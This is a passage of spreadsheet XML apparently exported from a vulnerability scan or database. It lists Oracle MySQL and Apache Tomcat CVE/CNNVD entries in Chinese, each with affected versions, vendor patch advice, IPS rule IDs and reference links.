https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-492
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-581
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-586
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-491
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-590</t>
  </si>
  <si>
    <t>Oracle MySQL Server拒绝服务漏洞(CVE-2016-0611)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-595
https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-10.html
https://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html#AppendixMSQL
https://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-490
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-592
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-593
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-492
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-491
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-586
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-587
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-590
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-533
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-583</t>
  </si>
  <si>
    <t>Oracle MySQL Server Client组件任意代码执行漏洞(CVE-2016-0503)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-490
https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-10.html
https://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html#AppendixMSQL
https://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞</t>
  </si>
  <si>
    <t>影响MySQL:5.0.0版本(含)到5.0.51a版本,5.1.0版本(含)到5.1.23版本,6.0.0版本(含)到6.0.4版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200712-102
https://bugs.mysql.com/bug.php?id=29801
https://bugs.mysql.com/bug.php?id=29908
https://bugs.mysql.com/bug.php?id=32111
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200712-104
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200712-083</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200712-104
http://dev.mysql.com/doc/refman/5.0/en/releasenotes-es-5-0-52.html</t>
  </si>
  <si>
    <t>yaSSL 缓冲区错误漏洞</t>
  </si>
  <si>
    <t>ips-13714, ips-11000012, ips-11000206, ips-11000151, ips-11000207, ips-11000152（有效）</t>
  </si>
  <si>
    <t>影响Mysql:5.0.0版本(含)到5.0.67版本,5.1版本(含)到5.1.23版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：https://www.wolfssl.com</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200801-154
https://exchange.xforce.ibmcloud.com/vulnerabilities/39429</t>
  </si>
  <si>
    <t>Oracle MySQL 输入验证错误漏洞</t>
  </si>
  <si>
    <t>影响MySQL:5.0.0版本(含)到5.0.88版本,5.1.0版本(含)到5.1.41版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200911-314
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201210-142
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200911-313</t>
  </si>
  <si>
    <t>MySQL 访问数据库MySQL的文件系统安全漏洞</t>
  </si>
  <si>
    <t>影响mysql:4.1.0版本(含)到4.1.21版本,5.0.0版本(含)到5.0.25版本,5.1.0版本(含)到5.1.12版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：http://lists.mysql.com/commits/5927http://lists.mysql.com/commits/9122</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200608-302
http://bugs.mysql.com/bug.php?id=17647</t>
  </si>
  <si>
    <t>MySQL访问验证及拒绝服务漏洞</t>
  </si>
  <si>
    <t>影响MySQL:5.0.0版本(含)到5.0.44版本</t>
  </si>
  <si>
    <t>http://dev.mysql.com/doc/refman/5.0/en/releasenotes-cs-5-0-45.html,http://dev.mysql.com/doc/refman/5.0/en/releasenotes-cs-5-0-45.html
http://secunia.com/advisories/27823</t>
  </si>
  <si>
    <t>http://dev.mysql.com/doc/refman/5.0/en/releasenotes-cs-5-0-45.html,http://dev.mysql.com/doc/refman/5.0/en/releasenotes-cs-5-0-45.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200707-243
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200707-245
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200707-242</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2015-4769)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201507-600
https://dev.mysql.com/doc/relnotes/mysql/5.6/en/
https://dev.mysql.com/doc/relnotes/mysql/5.5/en/
https://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201507-515
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201507-536
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201507-481
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201507-518
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201507-585
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201507-589
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201507-544
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201507-539</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2015-4905)</t>
  </si>
  <si>
    <t>影响MySQL:5.6.23及之前版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-479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
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-413
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-416
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-611
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-447
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-465
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-478</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2015-4800)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-383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
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-413
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-416
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-611
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-447
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-465
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-478
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-479
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-470
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-456
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-373
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201507-298
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-390
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-385</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2015-4910)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-484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t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2015-4866)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-443
http://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-27.html
https://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html#AppendixMSQL
https://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-441</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2015-4890)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-465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
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-589
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-484
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-487
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-375
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-374
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-400
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-435
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-396
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-413
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-416
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-611
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-447</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2015-0439)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-290
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-355
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-361
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-286
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201411-496
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-357
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-288
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-287
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-289</t>
  </si>
  <si>
    <t>Oracle MySQL Server拒绝服务漏洞(CVE-2016-0616)</t>
  </si>
  <si>
    <t>影响MySQL: 5.5.46及之前版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-597
https://mariadb.atlassian.net/browse/MDEV-9212
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-592
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-593
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-492
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-586</t>
  </si>
  <si>
    <t>Oracle MySQL Server拒绝服务漏洞(CVE-2016-0595)</t>
  </si>
  <si>
    <t>影响MySQL:5.6.27以下版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-581
https://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-28.html
https://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html#AppendixMSQL
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-490
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-592
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-593
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-492</t>
  </si>
  <si>
    <t>Oracle MySQL Server拒绝服务漏洞(CVE-2016-0610)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-594
https://mariadb.com/kb/en/library/mariadb-1019-changelog/
https://mariadb.com/kb/en/library/mariadb-1019-release-notes/
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201607-669
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-611</t>
  </si>
  <si>
    <t>Oracle MySQL Server拒绝服务漏洞(CVE-2016-0605)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-589
http://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-27.html
https://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html#AppendixMSQL
https://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-441
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-443
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-438
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-439
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-370</t>
  </si>
  <si>
    <t>MySQL 任意SQL命令执行漏洞</t>
  </si>
  <si>
    <t>ips-11000027（有效）</t>
  </si>
  <si>
    <t>影响MySQL:5.0.0版本(含)到5.0.93版本,5.1.0版本(含)到5.1.50版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://dev.mysql.com/doc/refman/5.0/en/news-5-0-93.htmlhttp://dev.mysql.com/doc/refman/5.1/en/news-5-1-50.html</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201208-292</t>
  </si>
  <si>
    <t>MySQL本地访问控制错误漏洞</t>
  </si>
  <si>
    <t>影响MySQL:3.20版本(含)到5.1.46版本</t>
  </si>
  <si>
    <t>目前厂商还没有提供补丁或者升级程序，建议使用此软件的用户随时关注厂商的主页以获取最新版本：http://lists.mandriva.com/security-announce/2010-05/msg00027.php</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201005-316
http://bugs.mysql.com/bug.php?id=40980</t>
  </si>
  <si>
    <t>MySQL suid例程的参数EXECUTE权限漏洞</t>
  </si>
  <si>
    <t>影响mysql:5.0.0版本(含)到5.0.25版本,5.1.0版本(含)到5.1.12版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200608-301
http://bugs.mysql.com/bug.php?id=18630</t>
  </si>
  <si>
    <t>http://dev.mysql.com/doc/refman/5.0/en/releasenotes-cs-5-0-45.html,http://dev.mysql.com/doc/refman/5.0/en/releasenotes-cs-5-0-45.html</t>
  </si>
  <si>
    <t>Tomcat: 9.0.54</t>
  </si>
  <si>
    <t>Apache Tomcat HttpServletResponse.sendError()跨站脚本漏洞(CVE-2008-1232)</t>
  </si>
  <si>
    <t>Tomcat: 6.0.14</t>
  </si>
  <si>
    <t>影响Tomcat:4.1.0版本(含)到4.1.37版本(含),5.5.0版本(含)到5.5.26版本(含),6.0.0版本(含)到6.0.16版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁获取链接http://tomcat.apache.org/</t>
  </si>
  <si>
    <t>Apache Tomcat 目录主机Appbase未授权访问漏洞(CVE-2009-2693)</t>
  </si>
  <si>
    <t>影响Tomcat:5.5.0版本(含)到5.5.28版本(含),6.0.0版本(含)到6.0.20版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：Ubuntu Ubuntu Linux 9.10 sparc Ubuntu libservlet2.5-java-doc_6.0.20-2ubuntu2.1_all.deb:http://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/libservlet2.5-java-doc_6.0.20-2ubuntu2.1_all.deb,Ubuntu libservlet2.5-java_6.0.20-2ubuntu2.1_all.deb:http://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/libservlet2.5-java_6.0.20-2ubuntu2.1_all.deb,Ubuntu libtomcat6-java_6.0.20-2ubuntu2.1_all.deb:http://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/libtomcat6-java_6.0.20-2ubuntu2.1_all.deb,Ubuntu tomcat6-admin_6.0.20-2ubuntu2.1_all.deb:http://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6-admin_6.0.20-2ubuntu2.1_all.deb,Ubuntu tomcat6-common_6.0.20-2ubuntu2.1_all.deb:http://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6-common_6.0.20-2ubuntu2.1_all.deb,Ubuntu tomcat6-docs_6.0.20-2ubuntu2.1_all.deb:http://security.ubuntu.com/ubuntu/pool/main/t/tomcat6/tomcat6-docs_6.0.20-2ubuntu2.1_all.deb,Ubuntu tomcat6-examples_6.0.20-2ubuntu2.1_all.deb:http://security.ubuntu.com/</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.us-cert.gov/cas/techalerts/TA07-108A.html
www.oracle.com
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2007.html
http://www.securitytracker.com/id?1017927
</t>
  </si>
  <si>
    <t>Apache Tomcat sendfile请求属性访问限制绕过漏洞(CVE-2011-2526)</t>
  </si>
  <si>
    <t>影响Tomcat:5.5.0版本(含)到5.5.34版本,6.0.0版本(含)到6.0.33版本,7.0.0版本(含)到7.0.19版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://tomcat.apache.org/security-5.htmlhttp://tomcat.apache.org/security-6.htmlhttp://tomcat.apache.org/security-7.html</t>
  </si>
  <si>
    <t>http://www.us-cert.gov/cas/techalerts/TA05-292A.html
http://www.kb.cert.org/vuls/id/210524
www.oracle.com
http://www.oracle.com/technology/deploy/security/pdf/cpuoct2005.html
https://lists.apache.org/thread.html/06cfb634bc7bf37af7d8f760f118018746ad8efbd519c4b789ac9c2e@%3Cdev.tomcat.apache.org%3E</t>
  </si>
  <si>
    <t>Apache Tomcat JVM远程拒绝服务漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:6.0.0版本(含)到6.0.31版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：  http://jakarta.apache.org/tomcat/index.html</t>
  </si>
  <si>
    <t>Apache Tomcat WebDav远程信息泄露漏洞(CVE-2007-5461)</t>
  </si>
  <si>
    <t>ips-12711（有效）</t>
  </si>
  <si>
    <t>影响Tomcat:4.0版本(含)到4.0.6版本(含),4.1版本(含)到4.1.36版本(含),5.0.0版本,5.5.0版本(含)到5.5.25版本(含),6.0版本(含)到6.0.14版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：http://jakarta.apache.org/tomcat/index.html</t>
  </si>
  <si>
    <t>Apache Tomcat XML解析器非授权文件读写漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:4.1版本(含)到4.1.39版本(含),5.5.0版本(含)到5.5.27版本(含),6.0版本(含)到6.0.18版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：http://svn.apache.org/viewvc?rev=739522&amp;view=revhttp://svn.apache.org/viewvc?rev=652592&amp;view=revhttp://svn.apache.org/viewvc?rev=781542&amp;view=revhttp://svn.apache.org/viewvc?rev=681156&amp;view=revhttp://svn.apache.org/viewvc?rev=781708&amp;view=rev</t>
  </si>
  <si>
    <t>Apache Tomcat Web表单哈希冲突拒绝服务漏洞</t>
  </si>
  <si>
    <t>ips-11020285（无效）</t>
  </si>
  <si>
    <t>影响Tomcat:5.0版本(含)到5.5.35版本,6.0版本(含)到6.0.35版本,7.0版本(含)到7.0.23版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://tomcat.apache.org/index.html</t>
  </si>
  <si>
    <t>Apache Tomcat 'jsp/cal/cal2.jsp'跨站脚本攻击漏洞(CVE-2009-0781)</t>
  </si>
  <si>
    <t>影响Tomcat:4.1.0版本(含)到4.1.39版本(含),5.5.0版本(含)到5.5.27版本(含),6.0.0版本(含)到6.0.18版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：http://tomcat.apache.org/security-6.htmlhttp://tomcat.apache.org/security-5.htmlhttp://tomcat.apache.org/security-4.htmlhttp://tomcat.apache.org/</t>
  </si>
  <si>
    <t>Apache Tomcat参数处理拒绝服务漏洞(CVE-2012-0022)</t>
  </si>
  <si>
    <t>影响Tomcat:5.5.0版本(含)到5.5.34版本(含),6.0.33以下版本(含),7.0.0版本(含)到7.0.22版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://tomcat.apache.org/security-7.htmlhttp://tomcat.apache.org/security-5.htmlhttp://tomcat.apache.org/security-6.html</t>
  </si>
  <si>
    <t>Apache Tomcat HTTP Digest Access Authentication实现安全漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:5.5.0版本(含)到5.5.36版本,6.0.0版本(含)到6.0.36版本,7.0.0版本(含)到7.0.30版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://tomcat.apache.org/security-6.htmlhttp://tomcat.apache.org/security-5.htmlhttp://tomcat.apache.org/security-7.html</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201211-315
http://svn.apache.org/viewvc?view=revision&amp;revision=1377807</t>
  </si>
  <si>
    <t>Apache Tomcat安全绕过漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:5.5.0版本(含)到5.5.33版本(含),6.0.0版本(含)到6.0.32版本(含),7.0.0版本(含)到7.0.11版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://tomcat.apache.org/download-70.cgi</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-174
http://svn.apache.org/viewvc?view=revision&amp;revision=1087643
https://bz.apache.org/bugzilla/show_bug.cgi?id=50928
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-174
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-175
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-176
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201907-1478
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201109-522
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201104-046</t>
  </si>
  <si>
    <t>Apache Tomcat 信任管理问题漏洞</t>
  </si>
  <si>
    <t>ips-10070106（无效）</t>
  </si>
  <si>
    <t>影响Tomcat:5.5.0版本(含)到5.5.28版本(含),6.0版本(含)到6.0.20版本(含)</t>
  </si>
  <si>
    <t>厂商目前已经发布了升级补丁以修复此安全问题，补丁获取链接：http://svn.apache.org/viewvc?view=revision&amp;revision=834047</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200911-145</t>
  </si>
  <si>
    <t>Apache Tomcat 表单认证用户名枚举漏洞(CVE-2009-0580)</t>
  </si>
  <si>
    <t>ips-11020221, ips-11023975（无效）</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：http://svn.apache.org/viewvc?rev=747840&amp;view=rev，http://svn.apache.org/viewvc?rev=781379&amp;view=rev，http://svn.apache.org/viewvc?rev=781382&amp;view=rev</t>
  </si>
  <si>
    <t>http://www.kb.cert.org/vuls/id/545804
www.oracle.com
http://www.oracle.com/technetwork/topics/security/cpujan2006-082403.html
http://xforce.iss.net/xforce/xfdb/24321
https://lists.apache.org/thread.html/06cfb634bc7bf37af7d8f760f118018746ad8efbd519c4b789ac9c2e@%3Cdev.tomcat.apache.org%3E</t>
  </si>
  <si>
    <t>Apache Tomcat 上下文参数错误 信息泄露漏洞(CVE-2008-0002)</t>
  </si>
  <si>
    <t>影响Tomcat:6.0.5版本(含)到6.0.15版本(含)</t>
  </si>
  <si>
    <t>目前厂商还没有提供补丁或者升级程序，建议使用此软件的用户随时关注厂商的主页以获取最新版本：http://www.yassl.com/</t>
  </si>
  <si>
    <t>http://www.kb.cert.org/vuls/id/545804
www.oracle.com
http://www.oracle.com/technetwork/topics/security/cpujan2006-082403.html
http://xforce.iss.net/xforce/xfdb/24321
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200802-166</t>
  </si>
  <si>
    <t>Apache Tomcat RequestDispatcher 任意文件读取漏洞(CVE-2008-2370)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接http://support.apple.com/kb/HT2647</t>
  </si>
  <si>
    <t>http://www.us-cert.gov/cas/techalerts/TA04-245A.html
http://www.kb.cert.org/vuls/id/435974
http://xforce.iss.net/xforce/xfdb/18656
https://lists.apache.org/thread.html/8dcaf7c3894d66cb717646ea1504ea6e300021c85bb4e677dc16b1aa@%3Cdev.tomcat.apache.org%3E</t>
  </si>
  <si>
    <t>Apache Tomcat Java AJP连接器无效头拒绝服务漏洞(CVE-2009-0033)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：http://svn.apache.org/viewvc?rev=742915&amp;view=revhttp://svn.apache.org/viewvc?rev=781362&amp;view=revhttp://svn.apache.org/viewvc?rev=781362&amp;view=rev</t>
  </si>
  <si>
    <t>http://www.cert.org/advisories/CA-2002-08.html
http://www.kb.cert.org/vuls/id/547459
http://xforce.iss.net/static/8100.php
https://lists.apache.org/thread.html/06cfb634bc7bf37af7d8f760f118018746ad8efbd519c4b789ac9c2e@%3Cdev.tomcat.apache.org%3E</t>
  </si>
  <si>
    <t>Apache Tomcat MemoryUserDatabase密码泄露漏洞(CVE-2011-2204)</t>
  </si>
  <si>
    <t>影响Tomcat:5.5.0版本(含)到5.5.34版本,6.0.0版本(含)到6.0.33版本,7.0.0版本(含)到7.0.17版本</t>
  </si>
  <si>
    <t>http://www.us-cert.gov/cas/techalerts/TA08-017A.html
www.oracle.com
http://www.oracle.com/technetwork/topics/security/cpujan2008-086860.html
http://marc.info/?l=bugtraq&amp;amp;m=120058413923005&amp;amp;w=2
https://lists.apache.org/thread.html/06cfb634bc7bf37af7d8f760f118018746ad8efbd519c4b789ac9c2e@%3Cdev.tomcat.apache.org%3E</t>
  </si>
  <si>
    <t>Apache Tomcat Transfer-Encoding头处理拒绝服务和信息泄露漏洞</t>
  </si>
  <si>
    <t>ips-11020229（有效）</t>
  </si>
  <si>
    <t>影响Tomcat:5.5.0版本(含)到5.5.29版本(含),6.0.0版本(含)到6.0.27版本(含),7.0.0 beta版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://svn.apache.org/viewvc?view=revision&amp;revision=958911http://svn.apache.org/viewvc?view=revision&amp;revision=958977http://svn.apache.org/viewvc?view=revision&amp;revision=959428</t>
  </si>
  <si>
    <t>Apache Tomcat SecurityManager安全策略绕过漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:5.5.0版本(含)到5.5.29版本(含),6.0.0版本(含)到6.0.29版本(含),7.0.0版本(含)到7.0.3版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://svn.apache.org/viewvc?view=revision&amp;revision=1027610</t>
  </si>
  <si>
    <t>Apache Tomcat AJP协议安全限制绕过漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:7.0.0版本(含)到7.0.20版本(含),6.0.0版本(含)到6.0.33版本(含),5.5.0版本(含)到5.5.33版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://tomcat.apache.org/security-7.html</t>
  </si>
  <si>
    <t>Apache Tomcat HTTP Digest Access Authentication安全限制绕过漏洞(CVE-2011-5064)</t>
  </si>
  <si>
    <t>Apache Tomcat HTML Manager Interface HTML注入漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:5.5.0版本(含)到5.5.31版本(含),6.0.0版本(含)到6.0.29版本(含),7.0.0版本(含)到7.0.5版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://svn.apache.org/viewvc?view=revision&amp;revision=1057279</t>
  </si>
  <si>
    <t>Apache Tomcat拒绝服务漏洞(CVE-2012-2733)</t>
  </si>
  <si>
    <t>影响Tomcat:7.0.0版本(含)到7.0.27版本(含),6.0.0版本(含)到6.0.35版本(含)</t>
  </si>
  <si>
    <t>Apache Tomcat会话劫持漏洞(CVE-2010-4312)</t>
  </si>
  <si>
    <t>影响Tomcat:6.0.0版本(含)到6.0.20版本(含),6.0.24版本,6.0.26版本(含)到6.0.29版本(含)</t>
  </si>
  <si>
    <t>目前厂商还没有提供此漏洞的相关补丁或者升级程序，建议使用此软件的用户随时关注厂商的主页以获取最新版本：http://tomcat.apache.org/</t>
  </si>
  <si>
    <t>Apache Tomcat HTTP Digest Access Authentication 安全绕过漏洞</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201211-314
http://svn.apache.org/viewvc?view=revision&amp;revision=1377807</t>
  </si>
  <si>
    <t>Apache Tomcat 权限许可和访问控制漏洞</t>
